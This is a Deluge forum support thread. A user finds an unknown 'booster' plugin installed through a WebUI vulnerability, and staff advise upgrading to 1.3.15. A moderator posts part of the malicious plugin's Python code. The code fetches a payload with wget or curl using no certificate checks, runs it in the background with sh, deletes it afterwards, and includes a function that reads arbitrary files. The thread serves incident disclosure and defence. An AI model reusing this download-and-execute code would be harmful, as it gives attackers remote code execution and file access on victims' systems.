[WebUI Vulnerability] Malicious plugin "booster" found on my system

General support for problems installing or using Deluge
ggez
New User
New User
Posts: 2
Joined: Fri May 12, 2017 11:47 pm
OS or Distro: raspbian

[WebUI Vulnerability] Malicious plugin "booster" found on my system

Postby ggez » Sat May 13, 2017 3:53 am

Admin Edit: Upgrade to 1.3.15 to fix this vulnerability

I don't remember adding this plugin called booster. It was enabled under my plugins. I have uploaded the booster.egg here. Keep in mind that an .egg file can be opened as a .zip file... I can't find reference to this plugin ANYWHERE on the internet. Sorry if I'm being paranoid. I looked at the source and it seems to download and execute stuff :S

I am running deluge/deluge-web on Raspbian

https://drive.google.com/file/d/0B23kWKbsf7NgdTdGUklTakNINGM/view?usp=sharing

Cas
Top Bloke
Top Bloke
Posts: 3442
Joined: Mon Dec 07, 2009 6:04 am
OS or Distro: Ubuntu 16.04
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Postby Cas » Sat May 13, 2017 7:04 am

If your webui is open to the internet it likely is a malicious egg utilising a know security flaw.

Upgrade to 1.3.15 as it has webui security fixes.

Cas
Top Bloke
Top Bloke
Posts: 3442
Joined: Mon Dec 07, 2009 6:04 am
OS or Distro: Ubuntu 16.04
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Postby Cas » Sat May 13, 2017 7:16 am

Also you should report this to debian as a serious security issue

Tvich
Member
Member
Posts: 33
Joined: Thu Apr 27, 2017 6:36 pm
OS or Distro: Linux/Alpine,Debian

Re: Malicious plugin "booster" found on my system?

Postby Tvich » Sat May 13, 2017 8:05 am


Cas
Top Bloke
Top Bloke
Posts: 3442
Joined: Mon Dec 07, 2009 6:04 am
OS or Distro: Ubuntu 16.04
Location: Scotland

Re: Malicious plugin "booster" found on my system?

Postby Cas » Sat May 13, 2017 8:20 am

Tvich wrote:https://www.virustotal.com/en/file/210b3a10785287480c4dbd007859140972a5637213b15a1c82a37d92324c580e/analysis/1494662659/

It definitely is malicious, it is modified execute plugin code.

Tvich
Member
Member
Posts: 33
Joined: Thu Apr 27, 2017 6:36 pm
OS or Distro: Linux/Alpine,Debian

Re: Malicious plugin "booster" found on my system?

Postby Tvich » Sat May 13, 2017 9:02 am

My bad, i misunderstood, thought it was Boost.Python. Don't know why. My bad :(

ggez
New User
New User
Posts: 2
Joined: Fri May 12, 2017 11:47 pm
OS or Distro: raspbian

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Postby ggez » Sun May 14, 2017 4:08 pm

Oh sh!t, didn't expect it to be this bad... any idea what it might have downloaded? are there any paths that I can check?

Cas
Top Bloke
Top Bloke
Posts: 3442
Joined: Mon Dec 07, 2009 6:04 am
OS or Distro: Ubuntu 16.04
Location: Scotland

Re: [WebUI Vulnerability] Malicious plugin "booster" found on my system

Postby Cas » Sun May 14, 2017 4:58 pm

There is likely no way to know for sure.

For reference this is partial summary of code added to the execute plugin:

Code: Select all

def looking_file(name):
    epath = os.environ.get("PATH", None)
    if not epath: epath = ("/usr/bin", "/usr/local/bin", "/usr/sbin", "/sbin", "/bin")
    for p in epath.split(":"):
        testname = p + "/" + name
        if os.path.exists(testname) and os.access(testname, os.X_OK):
            return testname
    return None

def internal_download(url, to):
    if sys.version_info[0] == 3:
        import urllib.request
        urllib.request.urlretrieve(url, to)
    else:
        import urllib
        urllib.urlretrieve(url, to)
   
def yahoo(URL):
    wget = looking_file("wget")
    curl = looking_file("curl")   
    cmd = None
    if wget:
        cmd = wget + " -t 0 -T 15 -q --no-check-certificate -O %s %s"
    elif curl:
        cmd = curl + " --retry 0 --connect-timeout 15 -k -q -o %s %s "
   
    tmpfile = tempfile.mkstemp()
    tmpname = tmpfile[1]
    os.fdopen(tmpfile[0]).close()
   
    if cmd:
        try:
            tcmd = cmd % (tmpname, URL)
            Popen(tcmd, shell = True, stdout = PIPE, stderr = PIPE).communicate()
        except:
            pass           
    else:
        try:
            if not os.path.exists(tmpname) or os.path.getsize(tmpname) == 0:
                internal_download(URL, tmpname)
        except Exception as err:
            return str(err)

    if os.path.exists(tmpname) and os.path.getsize(tmpname) > 0:
        try:
            os.chmod(tmpname, 0555)
            Popen("sh %s &" % tmpname, shell = True, stdout = PIPE, stderr = PIPE).communicate()
            time.sleep(2)
            os.remove(tmpname)
        except Exception as err:
            return str(err)
    return "OK"
   
    def get_file(self, filename):
        if os.path.exists(filename):
            fp = open(filename)
            data = fp.read()
            fp.close()
            return data
        else:
            return "FILE %s not exists" % filename


Return to “Support”

Who is online

Users browsing this forum: Bing [Bot] and 5 guests